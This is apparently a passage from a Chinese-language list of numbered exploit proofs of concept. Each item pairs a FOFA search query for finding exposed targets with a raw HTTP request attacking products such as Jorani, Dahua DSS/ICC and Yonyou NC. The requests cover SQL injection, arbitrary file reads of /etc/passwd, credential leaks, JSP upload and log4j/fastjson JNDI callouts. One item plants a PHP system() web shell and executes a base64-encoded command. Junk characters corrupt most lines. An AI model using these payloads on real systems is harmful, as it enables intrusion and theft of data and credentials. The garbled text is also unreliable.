GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
$ m% d/ d+ e: y# h9 gHost: 127.0.0.1
) q/ ^8 Z" O4 Z( d" X1 ?Pragma: no-cache
% I) B5 u5 q! Z$ E$ R, ^- L" ?- c( rCache-Control: no-cache
* G6 k0 J# |2 Y1 V. G: }7 j( n$ {Upgrade-Insecure-Requests: 1& X( i# K) H" u1 A. Z! q/ l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
6 L$ X) u( X! p2 v+ g/ TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 w7 {) y& o* {/ t- S+ `
Accept-Encoding: gzip, deflate
* T' K0 @$ Q. W$ V1 uAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 F5 c% U4 j" } E# @* IConnection: close
, L( t9 Y- V. X; A. o( Y2 q9 H2 ^4 c: L
7 \7 @# L) n# j! E6 u1 z k
12. Jorani < 1.0.2 远程命令执行5 e' r5 X! _1 J# ?; x# _
FOFA:title="Jorani"
: Q3 [* q3 G% C第一步先拿到cookie% }. d* L6 M$ ^5 h
GET /session/login HTTP/1.1
9 {/ h% R) Q6 B. H( n+ THost: 192.168.190.30
. ?! L! l5 W8 S d" {# ^User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
( s( w( R6 I( r, hConnection: close: Y3 D. X' B* W! K: X4 k; D4 L- m8 N) Q
Accept-Encoding: gzip
. Q) a; ?0 {2 H6 }1 _$ ]
/ u8 x; L8 }9 D6 V2 a; m7 W( i& Z* `4 @/ T$ G2 s
响应中csrf_cookie_jorani用于后续请求
8 O* L* }/ }+ q, r. v: hHTTP/1.1 200 OK
# [: u# Q: ~* }6 l, j! t5 q, W, c1 \Connection: close( R' z5 n* ]) F; j: f
Cache-Control: no-store, no-cache, must-revalidate3 M, m2 I( A( n2 I [5 d, V5 f9 B$ Q
Content-Type: text/html; charset=UTF-8
. o$ V( n) V. e& d1 M% ^Date: Tue, 24 Oct 2023 09:34:28 GMT
% C T. z" Q- F6 Z! lExpires: Thu, 19 Nov 1981 08:52:00 GMT/ M& b0 n, {: L
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
8 K# u% j9 Q5 VPragma: no-cache
3 @3 ?- Y* v- B. Y5 c# WServer: Apache/2.4.54 (Debian)/ Y3 _8 P) E* H' C- _9 m
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
/ A% S8 J) [) [. x$ iSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
, f* y0 j E( t$ |$ V+ Q+ pVary: Accept-Encoding& z2 O3 H7 A) j6 ^6 f, D7 ^
2 M* p5 |& L# W. }: ]7 L7 |3 R
' Y4 k+ N2 D+ L1 j* g; y% m. aPOST请求,执行函数并进行base64编码
4 n* z5 J! M% K1 KPOST /session/login HTTP/1.1# v& e" r, Y' D) N o; C. ~
Host: 192.168.190.30
) l* x2 n4 e" l" \) T" yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
" |) L9 Z5 C' Z3 D4 b, qConnection: close
! X7 T, n8 H d9 jContent-Length: 2522 j* G! W [) R2 ^: L
Content-Type: application/x-www-form-urlencoded5 d1 A$ y+ G/ e9 _9 u7 f& Z! O+ i
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r# ], G* W& H9 e9 [5 T
Accept-Encoding: gzip
4 |) `8 U+ J" ^# e3 Z" ?' y4 y- j2 C s* K0 [
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
% I6 M* c# B& q4 j6 T7 s
( D5 h+ I' H% O7 l+ x) `: L0 u3 \/ M+ G( ]9 m
& n# `, u" V+ ]# e- ]% e向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
/ J; u$ o( n/ M# J" `3 B! L1 GGET /pages/view/log-2023-10-24 HTTP/1.12 U$ O% I) j9 f
Host: 192.168.190.30; m% E3 c9 L8 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( s8 g6 i3 I7 V8 ~ u) b. Y; K+ e' sConnection: close
0 r% J. k- U! \5 S7 i, G6 ~Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
9 F2 X/ }2 n' v, \( BK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
) L6 ]5 g5 v6 V. C* ^X-REQUESTED-WITH: XMLHttpRequest
- V5 x0 I) G7 A$ o9 J5 p* TAccept-Encoding: gzip; ]8 |, G: m. \( L* [7 m4 }7 a
k7 p- X& g' u; w+ Q! S* T7 a2 [
13. 红帆iOffice ioFileDown任意文件读取2 h, s1 L& g/ u% P" I) p. ~
FOFA:app="红帆-ioffice"9 o& v% C. j- u3 _) b6 b$ ^- l" w2 c
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
2 U, o& e: W, l$ P' c, q: r5 I: ZHost: x.x.x.x, C6 g8 t+ {9 v8 c9 R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.361 H- H5 A+ G$ m9 K1 ^# S& i
Connection: close
: l: f! Z- n8 y+ ?Accept: */* f% u& b2 ]) l+ T* A2 @# z
Accept-Encoding: gzip
3 i6 J; k+ x9 @/ ]7 X# s1 d% l V7 Z
$ t* M+ n/ G2 r" t4 B, }/ G7 p14. 华夏ERP(jshERP)敏感信息泄露
; s* T: b8 n0 a: K6 R6 IFOFA:body="jshERP-boot"
4 }" H) p. t! x2 W6 K' R2 P泄露内容包括用户名密码
. @* W+ M7 u) G$ PGET /jshERP-boot/user/getAllList;.ico HTTP/1.1* L4 A, {! ]) N5 J5 ~
Host: x.x.x.x
! p% t8 Y" Y z4 l9 K; xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
3 E9 A {5 `% c. @5 [2 V" hConnection: close; h" n' h/ @# E) u& s3 Z) k
Accept: */*
- X* m% d/ n6 J. E8 tAccept-Language: en
1 s- M. e; C; }, wAccept-Encoding: gzip
& q- R) V5 k( n$ X
: I2 h+ X6 e* J* ^/ p9 X
9 b, i' k L' ^3 q+ p15. 华夏ERP getAllList信息泄露2 D9 D! _* _5 c
CVE-2024-0490 i5 [3 v# a- V. Z( R( O
FOFA:body="jshERP-boot"' `/ {( E5 Q, m; y4 Z5 m$ ?
泄露内容包括用户名密码
' t" g8 S! b* yGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.12 ~4 v5 {# O8 J* N
Host: 192.168.40.130:100
1 H, u' }: t# b: Y0 `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36+ f. M1 l7 `) o7 {6 ^' I
Connection: close
5 P8 r6 j1 Z; E9 }2 L; wAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
. \: ] z/ e' g6 u5 J& PAccept-Language: en$ n4 b1 Z5 k. i* L- N& b' R- |
sec-ch-ua-platform: Windows
( O* d6 t' Z9 v: DAccept-Encoding: gzip
4 a+ U. M/ {! A8 ^2 B* O1 w" S( ^9 U0 I3 x, X1 W3 K+ m
+ H9 @5 j t" p, {( f7 e' M
16. 红帆HFOffice医微云SQL注入
! E" _/ ]4 Q9 V) b KFOFA:title="HFOffice"9 r) G! y9 q- Q
poc中调用函数计算1234的md5值
, s. V; L5 O- V4 o8 e& L$ WGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1, e2 F. \6 m1 z* N0 {' C
Host: x.x.x.x
0 V: M8 a; M! o9 S6 DUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
$ f: p c# P7 m/ T2 g% nConnection: close5 t7 y$ U8 I, K
Accept: */*
9 n) X& K6 s' S+ c5 nAccept-Language: en+ ~/ c- b; _3 Z: d; C- Y9 y
Accept-Encoding: gzip! a$ |" v" k, u8 ]
( y$ q8 F$ [' F
. l' C0 X1 P$ J j, A
17. 大华 DSS itcBulletin SQL 注入+ r- T/ D7 K, ]+ R! q
FOFA:app="dahua-DSS"" Q8 g' S) I8 I6 _' f1 F
POST /portal/services/itcBulletin?wsdl HTTP/1.1
: ? N. l% a5 _Host: x.x.x.x' n( d9 r1 t* `0 R4 u7 \' Q R, } \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. K+ Q$ W; i: K" y# N/ ]5 l R) @
Connection: close3 Q3 @% Q6 u8 G5 F. d
Content-Length: 345
; Q( u9 W. u8 F/ e5 ^Accept-Encoding: gzip
3 r: V! Z9 r. D3 Y6 q
, S* K* }+ z: O1 z<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
$ S4 V3 T! `' Q. d) z) s) W5 v, _<s11:Body> {' C/ R- c5 U/ f5 Z1 m
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
8 S7 F$ v2 E# b! f1 H6 m& u2 T& P <netMarkings>
D3 b6 {' L! K0 g( J (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
; C" C g0 K2 j' s6 r </netMarkings>
2 y8 @' n0 f$ D0 K </ns1:deleteBulletin>$ r& F& Q, _! B9 V6 }8 {. j1 @& v
</s11:Body>
: V, Q- n& A( _% K6 f7 r, a</s11:Envelope>
* e& t5 |+ B; L" P# l a# l# I, T: f U* R
% C' G" G, l$ \+ K3 M18. 大华 DSS 数字监控系统 user_edit.action 信息泄露; u, K z4 k8 {) @
FOFA:app="dahua-DSS"
& {, Z+ v6 K! m0 v1 fGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
" k8 y: x3 r; EHost: your-ip+ l {+ m6 Q! Q/ v" q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 c% G: W/ k/ S, W7 F( q7 F: \Accept-Encoding: gzip, deflate
: R* F0 V; K9 W% c4 _; f4 _" a' ^- aAccept: */*6 }) T, i- w6 r* a
Connection: keep-alive
7 N+ K" j0 Y4 T7 K& @1 j& P& I5 t% T1 K3 V
+ }6 G: \! k) v- a. x
% U* j$ c5 E( W. ? \19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入0 B" A# B4 \/ e5 a
FOFA:app="dahua-DSS"
4 y$ ~! O7 ?' C# S( b0 \! h# x9 jGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1' M( X5 z: ?; [
Host:
& Z$ y) S9 j+ \! |+ ZUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36( A: S6 _5 E# j
Accept-Encoding: gzip, deflate+ r {+ `7 Q6 e" N
Accept: */*
+ {* k R8 C7 Y1 q1 H$ QConnection: keep-alive
" x( B1 i. M9 }0 E6 k
- {0 e$ h; V% p; b5 @/ k% w" ]( x W P' B
20. 大华ICC智能物联综合管理平台任意文件读取! d# z; ~1 W8 \: l
FOFA:body="*客户端会小于800*"- B O1 Z/ q7 l0 O" R- d+ M5 `
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1( q; \2 P, e1 f9 k2 l1 A
Host: x.x.x.x
$ G3 H7 I; S) A( d# YUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: a& V1 x9 w+ rConnection: close( o3 R, t B( f% t; R5 ^
Accept: */*$ H7 L T% p( n. i( g
Accept-Language: en) u+ {$ ?- ?' @8 }" j
Accept-Encoding: gzip/ c# ~0 q# r4 W8 D9 _+ Q D" n* w
6 v+ A) X+ y; y( \, W" r1 J
! ]( u' i# g3 @- v21. 大华ICC智能物联综合管理平台random远程代码执行
! G& @! l8 x$ t+ h. G" oFOFA:icon_hash="-1935899595"# }4 k, X/ E+ J: N$ |
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.17 n& Q% e, N! Z( `9 v4 |
Host: x.x.x.x/ v; i4 j7 I9 f8 Q6 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 i g; |4 T9 x: cContent-Length: 161
" G+ |9 C4 y: n9 [; MAccept-Encoding: gzip
1 ^) I; @4 A% [: d+ O6 b9 tConnection: close( W; ~ U8 g" w& w7 k f: g- S3 _
Content-Type: application/json;charset=utf-8) H* D! d T+ y
' V1 [/ ^3 l) u# T' `{$ ^' L- [/ m6 O; W6 Z8 g0 P# Y
"a":{- S! [; i9 H6 E, ?: ~( t; w3 i6 [/ R/ c
"@type":"com.alibaba.fastjson.JSONObject",) d# y! L4 m$ Q9 E% `3 ^( f
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
5 L9 T; ?! {& |3 q$ n3 R7 C5 z& p }""& d: l, _$ I5 b) `+ ]0 D
}* E S& p. s0 u: K
0 O- p3 @, C3 Y
3 R- C1 e# N, P" |$ Q1 j
22. 大华ICC智能物联综合管理平台 log4j远程代码执行1 y$ H7 Q( `2 s) n
FOFA:icon_hash="-1935899595"
0 k. ]" _* ~6 r* x" gPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
. V6 F7 _4 {: \Host: your-ip4 W5 `. H8 P9 ~- x- N! z2 [, O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" b# K: s/ M D- `
Content-Type: application/json;charset=utf-8& A" `" J9 o% X' c
) t( z* P: y3 g* X: {" L
{. S# h* z9 O* s# r
"loginName":"${jndi:ldap://dnslog}"0 t: R/ [$ l$ m* Y0 e9 y
}6 l. n, t' j. P' X
1 a) p# L& f4 J. {5 `$ U5 k+ i+ W- k0 Q3 c( Y
7 o5 A% N! [! h* b23. 大华ICC智能物联综合管理平台 fastjson远程代码执行" s2 W1 M3 f" P
FOFA:icon_hash="-1935899595"6 c! d2 U/ g( ^5 N
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
9 T" N: [$ p `! E8 cHost: your-ip
& [( Q# J- O2 z2 u0 @; cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* ^# {( i I7 p( y! QContent-Type: application/json;charset=utf-8- w; E0 @9 L$ w" i
Accept-Encoding: gzip
; i5 t1 e) q8 H, o& aConnection: close( @1 b: D+ E1 x2 _( w0 w7 c
$ Q$ q5 O2 R2 B5 f$ n3 Q{
; K( V2 x8 h: f, N+ v' X "a":{
! C) s+ d7 v1 g9 d, W "@type":"com.alibaba.fastjson.JSONObject",
9 b' d; Z$ T5 T9 J& n+ s7 m {"@type":"java.net.URL","val":"http://DNSLOG"}; r- g1 }, E1 K3 o: w
}""9 U7 t% C1 t' x; M" A- {1 ^
}
R* Q2 }( J/ L" d) t) {: z0 H3 x3 ~7 G( C$ M) D
1 n4 g1 F3 |9 w3 u( {24. 用友NC 6.5 accept.jsp任意文件上传* c4 \3 i; y2 O) q2 n' }9 O6 S! G
FOFA:icon_hash="1085941792"
4 C& b! C# t4 s3 i; k; kPOST /aim/equipmap/accept.jsp HTTP/1.1
! O. Q' r5 d: [7 _0 R5 WHost: x.x.x.x
9 Y. o, ~8 [- b# |& IUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
; e8 G* O; T- ~8 K% D1 E1 `Connection: close
R3 X6 D; d3 o( {; G: z' D: V' s" \Content-Length: 449
! B7 D2 R1 i$ h4 ?Accept: */*
2 I$ B% I5 {& `' a! oAccept-Encoding: gzip
( G9 L3 m' v9 F$ O `Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
& t; G' L8 R A+ s
/ d, Q4 L# l( X-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc0 `6 O5 Y( Y) I0 A: S
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"4 T! L3 b" X/ H3 Q4 X( g
Content-Type: text/plain
\9 m7 _/ z# D+ h
6 S" k6 T, K1 @9 ]( D/ J1 u6 p<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
( J6 Q3 _6 u" M- l-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc* \; b& p/ K3 r( @
Content-Disposition: form-data; name="fname" t. H/ k0 w8 o9 @+ t9 T( ?. n9 C
1 v _3 }. n: G# J: \
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
0 E5 M+ D+ Z0 l-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--; {- Y$ E3 I0 f8 _. Z* c X5 W
' W! S- j1 s. d5 h' X2 G- O
$ n0 d* ~/ n! m7 Y" p; d25. 用友NC registerServlet JNDI 远程代码执行+ L; n3 M+ K& U& U2 a! H; ~
FOFA:app="用友-UFIDA-NC"7 l+ W( z9 A& Z6 X0 T& a
POST /portal/registerServlet HTTP/1.1
9 @ C5 v- a/ v7 B. ^- GHost: your-ip+ w# T3 o; P# |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0- \% E: a& p# s b! c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
1 o+ V) j0 A0 z& G) S$ w9 UAccept-Encoding: gzip, deflate: d$ l1 G& w F7 G
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.62 A: G% A" u/ _' g5 z# w
Content-Type: application/x-www-form-urlencoded
2 _1 x, X6 |: L" G5 h3 j
F1 a1 \8 P$ o- R% Qtype=1&dsname=ldap://dnslog
9 M8 C7 z! O0 R" ~
3 ]- P4 [) I; p9 v. o/ A6 `# K
, h1 V3 t+ J+ i4 h" z$ Y2 {2 n5 t8 ^9 u7 L! |7 v
26. 用友NC linkVoucher SQL注入- ?; o8 c: U- _; t2 m4 t4 k% P7 v7 J1 i
FOFA:app="用友-UFIDA-NC"
$ j/ \8 s# t. ~7 a2 \7 Q& I( tGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. c& w! l7 v7 L; SHost: your-ip, B' x, m/ \% @* ~& \/ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- G; \) b7 w, V& t! l; o
Content-Type: application/x-www-form-urlencoded1 {$ L7 x8 R& r1 |* m- k9 `
Accept-Encoding: gzip, deflate9 D" g* c3 x5 C$ l9 R
Accept: */*
: y: o( V! d5 Z( y( fConnection: keep-alive
4 O1 a' N1 ~1 B" A5 r- U
2 {. L! o! |, j1 G4 d" i9 k, \: K' Z, P4 T
27. 用友 NC showcontent SQL注入6 }2 o9 G7 q) \) u
FOFA:icon_hash="1085941792"
+ E/ q1 g8 S5 yGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.16 e) V2 H- e$ Z! f
Host: your-ip' b- u) b6 i% z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 \1 e! y% T2 Y8 K5 k/ tAccept-Encoding: identity: E6 b3 h3 g. i3 b
Connection: close' [$ H5 ~6 t% H8 N0 ~
Content-Type: text/xml; charset=utf-85 p2 e/ O! r2 @+ z0 ^' y; |3 k: q
2 V3 ]0 C, P6 t( r& y
) u8 `4 W) @# i$ e. P. {
28. 用友NC grouptemplet 任意文件上传
" u. u" N7 F9 n. j) k3 C, y2 c+ QFOFA:icon_hash="1085941792"2 @" F! ~ Q+ ]) r6 }
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
, h7 z; z% ^) ]1 f) w& _) @! uHost: x.x.x.x( S/ Z3 x: s0 F: d* Y+ S( @5 g% P+ `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
& J% q4 i. A5 }7 q# ?/ s& j# Q1 SConnection: close5 n$ B3 Z' A& F$ V' i1 K- U) W
Content-Length: 268
9 X$ m$ t i/ n% N5 A3 tContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk0 P5 F4 A% a0 |+ F6 ~6 |
Accept-Encoding: gzip
. e( C, }2 G7 J+ ^ [ i
7 H, i4 a J: X) n3 K9 W# o------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
+ r) Q* ^3 w! L3 l) H" l2 G5 lContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
" [" P" h, {4 |5 a. Y m9 p1 o2 F5 EContent-Type: application/octet-stream) y c# }* B# {! V& }
( @- Q; ~1 Y* g) T" @ a
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>- L: @+ \# Q( s4 P6 m. o( V
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--& o2 g6 K3 K6 L( i6 @' \& W
( K/ f' e0 Z& d5 R& N
- A( z* p3 W0 K9 X# ~" m. [/uapim/static/pages/nc/head.jsp" z b4 R* T8 z5 ~8 s9 y8 C
1 x+ V" x/ p1 a8 F7 `3 u6 r1 N29. 用友NC down/bill SQL注入* }6 R* z. _5 @- I7 _* f
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
- y& E8 M6 ?: gGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1" W" P" l& r: W
Host: your-ip4 _/ {+ H( E9 o( |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 g4 x3 k+ S o( F" O
Content-Type: application/x-www-form-urlencoded; T. f. Y$ H% p( M" q7 r+ ~. l" r
Accept-Encoding: gzip, deflate
/ J! Z0 O) U! G; n) m# ?" g8 PAccept: */*
; H: \$ E; J6 J @1 V$ l! UConnection: keep-alive* j W6 C& {) @6 b" x% D
; u# Q; Z1 N" ]9 Z
0 R; T( H8 h( @) x# P7 p) N" K30. 用友NC importPml SQL注入4 a. m7 Y, o: W* e
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
4 [9 ]% u( o3 k- A8 bPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.10 u- e: w m2 y' y4 R3 `
Host: your-ip L, e/ \1 _. P9 e7 i U( o
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
) C& P: k0 O4 u8 X9 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.360 t E u7 L" ~
Connection: close
% H5 H" @: {6 F- f! d4 f5 o! S1 t& c. ^& u' R* J0 E
------WebKitFormBoundaryH970hbttBhoCyj9V4 Y" }. @% S1 S1 H7 k: A5 a! c8 y
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
4 a* t% J6 _) c3 iContent-Type: image/jpeg
A" {: ?, O3 s4 @------WebKitFormBoundaryH970hbttBhoCyj9V--9 m3 t3 v8 ^7 {8 O
; ^$ B& P" N$ b3 T& L9 }" Q* R4 t. t ?- w, ^ x( X
31. 用友NC runStateServlet SQL注入
/ p! m+ J: p) \4 J# T& Yversion<=6.5
1 J2 E3 E3 |) oFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
9 o( \5 I" F! x& S9 s9 x* C2 JGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
/ W3 X5 o) v) bHost: host
- y+ d+ W {: L4 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
8 N9 s, b, M( Y. t5 OContent-Type: application/x-www-form-urlencoded
* q& b6 h9 }. H; q' ~. D+ G% K2 ?; }/ P0 u
6 _9 f o( [2 F7 f4 C" A3 m) Q32. 用友NC complainbilldetail SQL注入
1 S$ h3 h( W" b8 x' v L9 vversion= NC633、NC65! P: h6 o$ l) o' O9 f5 P( q
FOFA:app="用友-UFIDA-NC"
L" C0 L$ }: I ? B3 YGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 s' v6 a1 R) HHost: your-ip
) g& r' n6 y9 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ d: ]' h, c# x& j2 y9 A+ B
Content-Type: application/x-www-form-urlencoded
' k* b L2 \8 R, k) B$ }3 T" `Accept-Encoding: gzip, deflate* b0 @$ U/ X2 ~9 t& o( q0 w$ W
Accept: */*7 d' n9 [6 m$ K8 H- L3 l7 L6 E
Connection: keep-alive
3 v1 }" v' }+ t# v8 C) E* j- N4 y/ p6 O. o9 L. ]3 x% a
4 ?* D7 K' _1 B/ s4 w
33. 用友NC downTax/download SQL注入
/ m& \$ N* ]/ a+ @$ H# ]version:NC6.5FOFA:app="用友-UFIDA-NC"
7 f6 n4 G% Y2 `+ n* cGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1- U8 m4 h5 p$ S2 j D6 D3 e3 Z+ D: \
Host: your-ip: L( [5 R G6 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ T2 I- U4 m( J+ Y2 b, l
Content-Type: application/x-www-form-urlencoded {4 m8 D4 f) u5 R1 X
Accept-Encoding: gzip, deflate5 P* z6 N$ M J
Accept: */*
8 r* e t5 n# _+ ?Connection: keep-alive
) I- t( V6 m" O* O( X
' b3 P. t! d/ r a3 I; J" _0 |+ |0 c' f( A( U) N3 n! m8 M
34. 用友NC warningDetailInfo接口SQL注入( ^7 N$ L! Q j) G+ @( q3 R, Z
FOFA:app="用友-UFIDA-NC"; I$ M: A$ o: v
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1* i2 G k, v6 H- t$ D4 j5 e5 S
Host: your-ip4 B1 O+ R$ Z+ Z: w* h/ o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% j6 @ T( R+ L% T8 rContent-Type: application/x-www-form-urlencoded
7 n J7 F: v. P4 _; h# b; X nAccept-Encoding: gzip, deflate2 p2 t5 C* a! E
Accept: */*5 y% l; w: ?+ s
Connection: keep-alive
0 Q. ~7 Y K- e3 u4 X! \
0 I/ r1 t S. e' }& h4 L4 S
8 w0 @7 x+ n$ B2 S& H7 r35. 用友NC-Cloud importhttpscer任意文件上传" e) Y5 L+ ?5 z" Y
FOFA:app="用友-NC-Cloud"
6 Z9 X" c( |2 u0 R* H7 s( CPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
